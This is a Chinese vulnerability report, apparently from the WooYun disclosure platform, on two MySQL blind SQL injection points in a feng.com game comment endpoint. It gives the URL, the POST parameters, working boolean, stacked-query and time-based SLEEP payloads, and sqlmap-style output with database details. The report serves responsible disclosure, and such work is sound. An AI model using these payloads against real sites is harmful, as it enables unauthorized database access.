漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:威锋网某站2处Mysql盲注
提交时间:2015-09-11 15:40
修复时间:2015-10-26 16:50
公开时间:2015-10-26 16:50
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-09-11: 细节已通知厂商并且等待厂商处理中 2015-09-11: 厂商已经确认,细节仅向厂商公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-26: 细节向公众公开
简要描述: soil...
详细说明: http://game.feng.com/gamenew/fengComment/getCommentListSecond.shtml post data: comment_id=270176&comment_type=article&modelId=89487&page=1 payload: comment_id=270176 and length(database())=2&comment_type=article&modelId=89487&page=1 comment_id=270176 and length(database())=3&comment_type=article&modelId=89487&page=1
漏洞证明:
--- Parameter: comment_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: comment_id=270176 AND 7432=7432&comment_type=article&modelId=89487&page=1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: comment_id=270176;SELECT SLEEP(5)#&comment_type=article&modelId=89487&page=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: comment_id=270176 AND SLEEP(5)&comment_type=article&modelId=89487&page=1 Parameter: modelId (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: comment_id=270176&comment_type=article&modelId=89487 AND 4448=4448&page=1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: comment_id=270176&comment_type=article&modelId=89487;SELECT SLEEP(5)#&page=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: comment_id=270176&comment_type=article&modelId=89487 AND SLEEP(5)&page=1 --- back-end DBMS: MySQL 5.1 current user: '[email protected] .%.%' current db: 'we+'
修复方案: 版权声明:转载请注明来源 紫霞仙子 @乌云
漏洞回应 厂商回应: 危害等级:中
漏洞Rank:10
确认时间:2015-09-11 16:49
厂商回复: 谢谢,修复中
最新状态: 暂无